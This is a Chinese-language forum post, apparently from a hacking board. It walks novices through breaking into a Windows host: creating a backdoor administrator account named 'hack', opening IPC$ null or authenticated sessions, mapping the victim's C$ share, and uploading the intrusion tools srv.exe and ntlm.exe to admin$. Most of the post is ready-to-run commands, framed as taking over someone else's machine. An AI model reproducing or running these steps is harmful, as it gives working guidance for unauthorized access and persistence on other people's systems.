斑竹老是说的这么简单,要知道这对新手并不简单哦~~每次都说的云里雾里的。。呵呵~~~
我接着说。如果你是用超级用户telnet上去的请跳过这一步,如果不是,请跟我来。
1)先建立用户 net user hack hack /add (假设用户为hack , 密码为hack)
给新建用户最高权限 net localgroup administrators hack /add
2)用新用户建立ipc$空连接,这个应该知道把
下一步 net use z: \\ip\c: (映射你想要的盘,)
然后你点开你自己的电脑可以看见有个映射盘,是你入侵的主机的盘,你想怎么样就怎么样哦)
即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
相关命令:
1.建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2.建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3.映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
关于copy
1.C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
2.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
